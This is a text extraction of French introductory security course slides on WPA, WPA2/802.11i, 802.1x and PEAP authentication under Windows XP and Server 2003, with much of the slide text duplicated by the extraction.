Objectifs de WPAObjectifs de WPARéseau sans fil sécurisé : 802.1x requis, Réseau sans fil sécurisé : 802.1x requis, chiffrement, gestion des clés Unicast et chiffrement, gestion des clés Unicast et globaleglobaleCorriger les faiblesses de WEP par une Corriger les faiblesses de WEP par une mise à jour logiciellemise à jour logicielleSolution sécurisée pour les réseaux Solution sécurisée pour les réseaux domestiquesdomestiquesEvolutif vers 802.11iEvolutif vers 802.11i

Page 310: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Caractéristiques de WPACaractéristiques de WPAAuthentification 802.1x requiseAuthentification 802.1x requise : EAP et : EAP et RADIUS, ou clé partagée (RADIUS, ou clé partagée (PSKPSK))Gestion des clés Gestion des clés Unicast et BroadcastUnicast et BroadcastTemporal Key Integrity ProtocolTemporal Key Integrity Protocol ( (TKIPTKIP))MichaelMichael : MIC (64 bits) remplace le : MIC (64 bits) remplace le CRC32 de WEPCRC32 de WEPAESAES (optionnel) à la place de RC4 (optionnel) à la place de RC4Support de clients WPA et WEP en même Support de clients WPA et WEP en même tempstemps

Page 311: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Modes WPAModes WPAMode Entreprise (Mode Entreprise (RADIUSRADIUS)) Nécessite un serveur d’authentificationNécessite un serveur d’authentification RADIUS pour authentification et distribution des clésRADIUS pour authentification et distribution des clés Gestion centralisée des utilisateursGestion centralisée des utilisateurs

Mode clé partagée – Mode clé partagée – pre-shared keypre-shared key mode mode ((PSKPSK)) Ne nécessite pas de serveur d’authentificationNe nécessite pas de serveur d’authentification « Secret partagé » pour l’authentification sur le point « Secret partagé » pour l’authentification sur le point

d’accès – 256 bitsd’accès – 256 bits Génération de la clé depuis une Génération de la clé depuis une passphrasepassphrase : :

algorithme imposéalgorithme imposé

Page 312: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

WPA 802.1xWPA 802.1x

RADIUSserverDistribution System

TKIP

Authentification 802.1X

802.1X key management

RADIUS-based key distribution

Security Discovery (WPA Information

Element)

Scénario entreprise

Page 313: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

WPA PSKWPA PSK

TKIP

802.1X key management

Scénario domestique

Security Discovery (WPA Information Element)

Page 314: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

WPAWPANécessite une mise à jour :Nécessite une mise à jour : FirmwareFirmware du point d’accès du point d’accès FirmwareFirmware de la carte de la carte DriverDriver de la carte de la carte Logiciel client (« Logiciel client (« supplicantsupplicant ») »)

Page 315: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

802.11i802.11iWPA = sous-ensemble de 802.11iWPA = sous-ensemble de 802.11i

802.1x en modes entreprise et PSK802.1x en modes entreprise et PSKMode point d’accès (infrastructure – BSS)Mode point d’accès (infrastructure – BSS)

Hiérarchie de clésHiérarchie de clésGestion des clésGestion des clésNégociation de la crypto et de l’authentificationNégociation de la crypto et de l’authentificationTKIPTKIP

Page 316: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

802.11i802.11i802.11i :802.11i :

802.1x en modes entreprise et PSK802.1x en modes entreprise et PSKMode point d’accès (infrastructure – BSS)Mode point d’accès (infrastructure – BSS)Mode point à point (ad-hoc – IBSS)Mode point à point (ad-hoc – IBSS)Pré-authentificationPré-authentificationHiérarchie de clésHiérarchie de clésGestion des clésGestion des clésNégociation de la crypto et de l’authentificationNégociation de la crypto et de l’authentificationTKIPTKIPAESAES

Page 317: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SynthèseSynthèse

EAP methods

Radio Technology

Network Authentication (802.11)

Authentication and Key Management

EncryptionWEP

802.11a 802.11b 802.11g

TKIP/MIC AES

WPAOpen

WPA2Shared

802.1XEAP-TLS PEAP

Page 318: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

ComparaisonComparaisonWEPWEP WPAWPA WPA2/802.11iWPA2/802.11i

CipherCipher RC4RC4 RC4RC4 AESAES

Key SizeKey Size 40 bits40 bits128 bits encryption128 bits encryption

64 bits Authentication64 bits Authentication 128 bits128 bits

Key LifeKey Life 24-bit IV24-bit IV 48-bit IV48-bit IV 48-bit IV48-bit IV

Packet KeyPacket Key ConcatenatedConcatenated Mixing FunctionMixing Function Not NeededNot Needed

Data IntegrityData Integrity CRC-32CRC-32 MichaelMichael CCMCCM

Header IntegrityHeader Integrity NoneNone MichaelMichael CCMCCM

Replay AttackReplay Attack NoneNone IV SequenceIV Sequence IV SequenceIV Sequence

Key ManagementKey Management NoneNone EAP-basedEAP-based EAP-basedEAP-based

http://www.wi-fi.org/OpenSection/pdf/Wi-Fi_ProtectedAccessWebcast_2003.pdf

Page 319: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Mise en œuvre dans WindowsMise en œuvre dans Windows

Page 320: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Natif :Natif : 802.1x EAP-TLS802.1x EAP-TLS Wireless Zero Configuration ServiceWireless Zero Configuration Service

SP1 : PEAPSP1 : PEAP 802.1x PEAP-EAP-MS-CHAPv2802.1x PEAP-EAP-MS-CHAPv2 802.1x PEAP-EAP-TLS802.1x PEAP-EAP-TLS

SP2 : WPA (authentification, TKIP, AES)SP2 : WPA (authentification, TKIP, AES) Ou SP1+KB.826942 Ou SP1+KB.826942

http://support.microsoft.com/?id=826942http://support.microsoft.com/?id=826942

Windows XPWindows XP

Page 321: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Windows XPWindows XPAuthentificationAuthentification OuverteOuverte PartagéePartagée WPAWPA WPA-PSKWPA-PSK

ChiffrementChiffrement DésactivéDésactivé WEPWEP TKIPTKIP AESAES

Page 322: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

802.1x802.1xEAP-TLS : « carte à EAP-TLS : « carte à puce ou autre puce ou autre certificat »certificat »PEAPPEAP MS-CHAP v2MS-CHAP v2 EAP-TLSEAP-TLS

Windows XPWindows XP

Page 323: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Authentification PEAP avec WindowsAuthentification PEAP avec WindowsPhase 1 – logon Phase 1 – logon machinemachine Association 802.11Association 802.11 Authentification de l’AP (secret RADIUS)Authentification de l’AP (secret RADIUS) Authentification du serveur RADIUS (certificat)Authentification du serveur RADIUS (certificat) Authentification de la machine (compte machine, mot Authentification de la machine (compte machine, mot

de passe)de passe) Connexion du « Controlled Port » - pour l’accès de la Connexion du « Controlled Port » - pour l’accès de la

machine aux ressources autoriséesmachine aux ressources autoriséesPhase 2 – logon Phase 2 – logon utilisateurutilisateur Authentification de l’utilisateurAuthentification de l’utilisateur Connexion du «Connexion du « Controlled Port Controlled Port » - pour l’accès de  » - pour l’accès de

l’utilisateur aux ressources autoriséesl’utilisateur aux ressources autorisées

Page 324: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Pourquoi authentifier la machine ?Pourquoi authentifier la machine ?Logon de la machine dans le domaine Logon de la machine dans le domaine nécessaire:nécessaire: Group PoliciesGroup Policies Scripts de logon machineScripts de logon machine Management : inventaire, déploiement d’application Management : inventaire, déploiement d’application

par GPO/SMS/autrespar GPO/SMS/autres

Expiration du mot de passe de l’utilisateur :Expiration du mot de passe de l’utilisateur : Connexion et logon machine nécessaires pour la Connexion et logon machine nécessaires pour la

notification de l’utilisateur le changement de mot de notification de l’utilisateur le changement de mot de passepasse

Page 325: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Internet Authentication ServerInternet Authentication Server ( (IASIAS)) Serveur RADIUS de MicrosoftServeur RADIUS de Microsoft Remote Access PoliciesRemote Access Policies EAP-TLS, PEAP (MS-CHAP v2, EAP-TLS)EAP-TLS, PEAP (MS-CHAP v2, EAP-TLS)Certificate ServicesCertificate Services PKI avec auto-enrôlement des machines et des PKI avec auto-enrôlement des machines et des

utilisateursutilisateursActive DirectoryActive Directory Gestion centralisée des machines et utilisateursGestion centralisée des machines et utilisateurs Configuration centralisée des clients Wi-Fi (Configuration centralisée des clients Wi-Fi (Group Group

PoliciesPolicies) [) [WPA : SP1WPA : SP1]]

Windows Server 2003Windows Server 2003

Page 326: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,
Page 327: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

RessourcesRessourcesNe pas être administrateur dans Windows Ne pas être administrateur dans Windows http://weblogs.asp.net/aaron_margosis/http://weblogs.asp.net/aaron_margosis/ Voir un buffer overflow pas à pasVoir un buffer overflow pas à pashttp://www.devarticles.com/c/a/Cplusplus/http://www.devarticles.com/c/a/Cplusplus/Buffer-Overflow-the-Security-Threat.-WhatBuffer-Overflow-the-Security-Threat.-What-Is-It/1/-Is-It/1/